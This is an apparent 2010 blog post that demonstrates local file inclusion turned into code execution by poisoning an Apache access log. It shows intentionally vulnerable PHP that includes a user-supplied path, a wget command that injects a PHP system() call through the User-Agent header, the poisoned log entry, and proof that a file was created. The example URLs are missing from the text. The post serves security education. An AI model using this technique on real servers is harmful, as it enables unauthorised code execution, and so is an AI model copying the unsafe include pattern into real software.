Wednesday, January 6, 2010

Local File Include Code Execution

Based on, I created a demo app to play with this. The vulnerable PHP code looks like:


$file = $_GET['id'];
echo $file;

if (file_exists($file))
include $file;


The following URL demostrates a local file include:

An attacker can control various parts of the web server log that he generates. For example the -U flag to wget sets a custom User-Agent header:

wget -U "<?php system('touch /tmp/dennis'); ?>"

And it generates the following Apache access_log entry: - - [06/Jan/2010:20:15:04 -0600] "GET / HTTP/1.0" 200 2212 "-" "<?php system('touch /tmp/dennis'); ?>"

If we request the following URL: *

* the path to Apache's access_log varies per configuration.

animals.php's include statement includes the access_log which happens to have a log entry with a User-Agent set to a snippet of attacker controlled PHP code:

dennis@ipa:~$ ls -l /tmp/dennis
-rw-r--r-- 1 www wheel 0 Jan 6 20:26 /tmp/dennis

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